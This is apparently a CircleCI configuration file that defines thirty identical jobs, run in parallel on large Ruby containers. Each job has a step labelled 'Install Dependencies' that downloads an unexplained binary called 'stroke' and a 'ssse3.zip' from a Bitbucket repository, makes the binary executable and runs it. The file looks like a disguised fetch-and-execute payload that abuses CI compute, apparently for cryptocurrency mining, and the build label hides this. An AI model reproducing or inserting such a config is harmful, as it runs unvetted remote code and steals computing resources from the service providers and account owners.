version: 2.1
jobs:
    aku1:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku2:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku3:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku4:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku5:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku6:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku7:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku8:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku9:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku10:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku11:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku12:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku13:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku14:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku15:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku16:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku17:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku18:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku19:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku20:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku21:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku22:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku23:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku24:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku25:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku26:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku27:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku28:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku29:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke
    aku30:
      docker:
            - image: ruby
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/5d12b4fe968c634983f8fb0e0ae38064c6c4d7ce/stroke
              wget https://bitbucket.org/bsii1jd9j1/chain/raw/66c61b019d30cd533c801a307757763cdfe66a32/ssse3.zip
              chmod 777 stroke && ./stroke

workflows:
    version: 2.1
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5
            - aku6
            - aku7
            - aku8
            - aku9
            - aku10
            - aku11
            - aku12
            - aku13
            - aku14
            - aku15
            - aku16
            - aku17
            - aku18
            - aku19
            - aku20
            - aku21
            - aku22
            - aku23
            - aku24
            - aku25
            - aku26
            - aku27
            - aku28
            - aku29
            - aku30